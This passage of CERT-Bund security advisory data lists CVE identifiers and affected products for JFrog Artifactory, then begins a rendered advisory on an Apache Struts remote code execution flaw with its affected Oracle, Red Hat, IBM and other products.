"source_lang": "en-US",
"title": "JFrog Artifactory: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-10-12T22:00:00.000+00:00",
"generator": {
"date": "2025-10-13T09:29:51.555+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.4.0"
}
},
"id": "WID-SEC-W-2022-1375",
"initial_release_date": "2022-09-11T22:00:00.000+00:00",
"revision_history": [
{
"date": "2022-09-11T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2022-10-03T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates aufgenommen"
},
{
"date": "2022-10-04T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2022-12-12T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2022-12-20T23:00:00.000+00:00",
"number": "5",
"summary": "Referenz(en) aufgenommen: FEDORA-2022-DB674BAFD9, FEDORA-2022-7E327A20BE"
},
{
"date": "2023-09-14T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-10-12T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von SUSE aufgenommen"
}
],
"status": "final",
"version": "7"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "JFrog Artifactory",
"product": {
"name": "JFrog Artifactory",
"product_id": "T024527",
"product_identification_helper": {
"cpe": "cpe:/a:jfrog:artifactory:-"
}
}
},
{
"category": "product_version_range",
"name": "\u003c7.46.3",
"product": {
"name": "JFrog Artifactory \u003c7.46.3",
"product_id": "T024764"
}
},
{
"category": "product_version",
"name": "7.46.3",
"product": {
"name": "JFrog Artifactory 7.46.3",
"product_id": "T024764-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:jfrog:artifactory:7.46.3"
}
}
}
],
"category": "product_name",
"name": "Artifactory"
}
],
"category": "vendor",
"name": "JFrog"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
},
{
"branches": [
{
"category": "product_name",
"name": "Ubuntu Linux",
"product": {
"name": "Ubuntu Linux",
"product_id": "T000126",
"product_identification_helper": {
"cpe": "cpe:/o:canonical:ubuntu_linux:-"
}
}
}
],
"category": "vendor",
"name": "Ubuntu"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2013-4517",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2013-4517"
},
{
"cve": "CVE-2013-7285",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2013-7285"
},
{
"cve": "CVE-2014-0107",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2014-0107"
},
{
"cve": "CVE-2014-0114",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2014-0114"
},
{
"cve": "CVE-2014-3577",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2014-3577"
},
{
"cve": "CVE-2014-3623",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2014-3623"
},
{
"cve": "CVE-2015-0227",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2015-0227"
},
{
"cve": "CVE-2015-2575",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2015-2575"
},
{
"cve": "CVE-2015-3253",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2015-3253"
},
{
"cve": "CVE-2015-4852",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2015-4852"
},
{
"cve": "CVE-2015-7940",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2015-7940"
},
{
"cve": "CVE-2016-10750",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2016-10750"
},
{
"cve": "CVE-2016-3092",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2016-3092"
},
{
"cve": "CVE-2016-3674",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2016-3674"
},
{
"cve": "CVE-2016-6501",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2016-6501"
},
{
"cve": "CVE-2016-8735",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2016-8735"
},
{
"cve": "CVE-2016-8745",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2016-8745"
},
{
"cve": "CVE-2017-1000487",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2017-1000487"
},
{
"cve": "CVE-2017-15095",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2017-15095"
},
{
"cve": "CVE-2017-17485",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2017-17485"
},
{
"cve": "CVE-2017-18214",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2017-18214"
},
{
"cve": "CVE-2017-18640",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2017-18640"
},
{
"cve": "CVE-2017-7525",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2017-7525"
},
{
"cve": "CVE-2017-7657",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2017-7657"
},
{
"cve": "CVE-2017-7957",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2017-7957"
},
{
"cve": "CVE-2017-9506",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2017-9506"
},
{
"cve": "CVE-2018-1000206",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2018-1000206"
},
{
"cve": "CVE-2018-9116",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2018-9116"
},
{
"cve": "CVE-2019-10219",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2019-10219"
},
{
"cve": "CVE-2019-12402",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2019-12402"
},
{
"cve": "CVE-2019-17359",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2019-17359"
},
{
"cve": "CVE-2019-17571",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2019-17571"
},
{
"cve": "CVE-2019-20104",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2019-20104"
},
{
"cve": "CVE-2020-11996",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-11996"
},
{
"cve": "CVE-2020-13934",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-13934"
},
{
"cve": "CVE-2020-13935",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-13935"
},
{
"cve": "CVE-2020-13949",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-13949"
},
{
"cve": "CVE-2020-14340",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-14340"
},
{
"cve": "CVE-2020-15586",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-15586"
},
{
"cve": "CVE-2020-1745",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-1745"
},
{
"cve": "CVE-2020-17521",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-17521"
},
{
"cve": "CVE-2020-25649",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-25649"
},
{
"cve": "CVE-2020-28500",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-28500"
},
{
"cve": "CVE-2020-29582",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-29582"
},
{
"cve": "CVE-2020-36518",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-36518"
},
{
"cve": "CVE-2020-7226",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-7226"
},
{
"cve": "CVE-2020-7692",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-7692"
},
{
"cve": "CVE-2020-8203",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2020-8203"
},
{
"cve": "CVE-2021-13936",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-13936"
},
{
"cve": "CVE-2021-21290",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-21290"
},
{
"cve": "CVE-2021-22060",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-22060"
},
{
"cve": "CVE-2021-22112",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-22112"
},
{
"cve": "CVE-2021-22119",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-22119"
},
{
"cve": "CVE-2021-22147",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-22147"
},
{
"cve": "CVE-2021-22148",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-22148"
},
{
"cve": "CVE-2021-22149",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-22149"
},
{
"cve": "CVE-2021-22573",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-22573"
},
{
"cve": "CVE-2021-23337",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-23337"
},
{
"cve": "CVE-2021-25122",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-25122"
},
{
"cve": "CVE-2021-26291",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-26291"
},
{
"cve": "CVE-2021-27568",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-27568"
},
{
"cve": "CVE-2021-29505",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-29505"
},
{
"cve": "CVE-2021-30129",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-30129"
},
{
"cve": "CVE-2021-33037",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-33037"
},
{
"cve": "CVE-2021-35550",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35550"
},
{
"cve": "CVE-2021-35556",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35556"
},
{
"cve": "CVE-2021-35560",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35560"
},
{
"cve": "CVE-2021-35561",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35561"
},
{
"cve": "CVE-2021-35564",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35564"
},
{
"cve": "CVE-2021-35565",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35565"
},
{
"cve": "CVE-2021-35567",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35567"
},
{
"cve": "CVE-2021-35578",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35578"
},
{
"cve": "CVE-2021-35586",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35586"
},
{
"cve": "CVE-2021-35588",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35588"
},
{
"cve": "CVE-2021-35603",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-35603"
},
{
"cve": "CVE-2021-36374",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-36374"
},
{
"cve": "CVE-2021-3765",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-3765"
},
{
"cve": "CVE-2021-3807",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-3807"
},
{
"cve": "CVE-2021-38561",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-38561"
},
{
"cve": "CVE-2021-3859",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-3859"
},
{
"cve": "CVE-2021-41090",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-41090"
},
{
"cve": "CVE-2021-41091",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-41091"
},
{
"cve": "CVE-2021-42340",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-42340"
},
{
"cve": "CVE-2021-42550",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-42550"
},
{
"cve": "CVE-2021-43797",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2021-43797"
},
{
"cve": "CVE-2022-0536",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-0536"
},
{
"cve": "CVE-2022-22963",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-22963"
},
{
"cve": "CVE-2022-23632",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-23632"
},
{
"cve": "CVE-2022-23648",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-23648"
},
{
"cve": "CVE-2022-23806",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-23806"
},
{
"cve": "CVE-2022-24769",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-24769"
},
{
"cve": "CVE-2022-24823",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-24823"
},
{
"cve": "CVE-2022-27191",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-27191"
},
{
"cve": "CVE-2022-29153",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-29153"
},
{
"cve": "CVE-2022-32212",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-32212"
},
{
"cve": "CVE-2022-32213",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-32213"
},
{
"cve": "CVE-2022-32214",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-32214"
},
{
"cve": "CVE-2022-32215",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-32215"
},
{
"cve": "CVE-2022-32223",
"product_status": {
"known_affected": [
"T024527",
"T002207",
"67646",
"T000126",
"T024764"
]
},
"release_date": "2022-09-11T22:00:00.000+00:00",
"title": "CVE-2022-32223"
}
]
}
WID-SEC-W-2023-0918
Vulnerability from csaf_certbund - Published: 2014-05-06 22:00 - Updated: 2025-07-30 22:00Summary
Apache Struts: Schwachstelle ermöglicht Ausführen von beliebigem Programmcode mit den Rechten des Dienstes
Severity
Mittel
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: Struts ist ein Framework für Java-Anwendungen auf dem Webserver Apache.
Angriff: Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Apache Struts ausnutzen, um beliebigen Programmcode mit den Rechten des Dienstes auszuführen.
Betroffene Betriebssysteme: - Linux
- UNIX
- Windows
Affected products
Known affected
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle Retail Markdown Optimization 13.1
Oracle / Retail Invoice Matching
|
cpe:/a:oracle:retail_invoice_matching:13.1
|
13.1 | |
|
Oracle Retail Allocation 13.2
Oracle / Retail Allocation
|
cpe:/a:oracle:retail_allocation:13.2
|
13.2 | |
|
NetApp OnCommand Unified Manager
NetApp
|
cpe:/a:netapp:oncommand_unified_manager:-
|
— | |
|
IBM Operational Decision Manager 8.10
IBM / Operational Decision Manager
|
cpe:/a:ibm:operational_decision_manager:8.10
|
8.1 | |
|
Apache Struts 1
Apache / Struts
|
cpe:/a:apache:struts:1
|
1 | |
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Oracle Retail Invoice Matching 13.2
Oracle / Retail Invoice Matching
|
cpe:/a:oracle:retail_invoice_matching:13.2
|
13.2 | |
|
Oracle Retail Invoice Matching 13.0
Oracle / Retail Invoice Matching
|
cpe:/a:oracle:retail_invoice_matching:13.0
|
13 | |
|
Oracle Retail Invoice Matching 12.1
Oracle / Retail Invoice Matching
|
cpe:/a:oracle:retail_invoice_matching:12.1
|
12.1 | |
|
Oracle Retail Invoice Matching 12.0 IN
Oracle / Retail Invoice Matching
|
cpe:/a:oracle:retail_invoice_matching:12.0in
|
12.0 IN | |
|
Oracle Retail Invoice Matching 12.0
Oracle / Retail Invoice Matching
|
cpe:/a:oracle:retail_invoice_matching:12.0
|
12 | |
|
Oracle Retail Invoice Matching 11.0
Oracle / Retail Invoice Matching
|
cpe:/a:oracle:retail_invoice_matching:11.0
|
11 | |
|
HPE XP P9000 Command View Advanced Edition
HPE
|
cpe:/a:hp:xp_p9000_command_view_advanced_edition:-
|
— | |
|
HPE SiteScope
HPE
|
cpe:/a:hp:sitescope:-
|
— | |
|
Oracle Primavera
Oracle
|
cpe:/a:oracle:primavera_portfolio_management:7.0
|
— | |
|
Red Hat Enterprise Linux Desktop 5
Red Hat / Enterprise Linux Desktop
|
cpe:/o:redhat:enterprise_linux_desktop:5:client
|
5 | |
|
Red Hat JBoss Fuse
Red Hat
|
cpe:/a:redhat:jboss_fuse:-
|
— | |
|
Oracle Retail Markdown Optimization 13.4
Oracle / Retail Markdown Optimization
|
cpe:/a:oracle:retail_markdown_optimization:13.4
|
13.4 | |
|
Oracle Retail Allocation 13.0
Oracle / Retail Allocation
|
cpe:/a:oracle:retail_allocation:13.0
|
13 | |
|
Oracle Retail Allocation 13.1
Oracle / Retail Allocation
|
cpe:/a:oracle:retail_allocation:13.1
|
13.1 | |
|
Oracle Retail Clearance Optimization Engine 13.3
Oracle / Retail Clearance Optimization Engine
|
cpe:/a:oracle:retail_clearance_optimization_engine:13.3
|
13.3 | |
|
Oracle Retail Clearance Optimization Engine 13.4
Oracle / Retail Clearance Optimization Engine
|
cpe:/a:oracle:retail_clearance_optimization_engine:13.4
|
13.4 | |
|
Oracle Retail Clearance Optimization Engine 14.0
Oracle / Retail Clearance Optimization Engine
|
cpe:/a:oracle:retail_clearance_optimization_engine:14.0
|
14 | |
|
Oracle Retail Invoice Matching 14.0
Oracle / Retail Invoice Matching
|
cpe:/a:oracle:retail_invoice_matching:14.0
|
14 | |
|
Oracle Retail Markdown Optimization 12.0
Oracle / Retail Markdown Optimization
|
cpe:/a:oracle:retail_markdown_optimization:12.0
|
12 | |
|
Oracle Retail Markdown Optimization 13.0
Oracle / Retail Markdown Optimization
|
cpe:/a:oracle:retail_markdown_optimization:13.0
|
13 | |
|
Oracle Retail Allocation 10.0
Oracle / Retail Allocation
|
cpe:/a:oracle:retail_allocation:10.0
|
10 | |
|
Red Hat Enterprise Linux 5
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:5::server
|
5 | |
|
Oracle Retail Allocation 11.0
Oracle / Retail Allocation
|
cpe:/a:oracle:retail_allocation:11.0
|
11 | |
|
Oracle Retail Markdown Optimization 13.2
Oracle / Retail Markdown Optimization
|
cpe:/a:oracle:retail_markdown_optimization:13.2
|
13.2 | |
|
Oracle Retail Allocation 12.0
Oracle / Retail Allocation
|
cpe:/a:oracle:retail_allocation:12.0
|
12 | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Network Satellite Server
Red Hat
|
cpe:/h:redhat:network_satelite_server:-
|
— | |
|
Debian Linux Wheezy (7.0)
Debian
|
cpe:/o:debian:debian_linux:7.0
|
— | |
|
IBM Operational Decision Manager 8.11
IBM / Operational Decision Manager
|
cpe:/a:ibm:operational_decision_manager:8.11
|
8.11 |
References
18 references
{
"document": {
"aggregate_severity": {
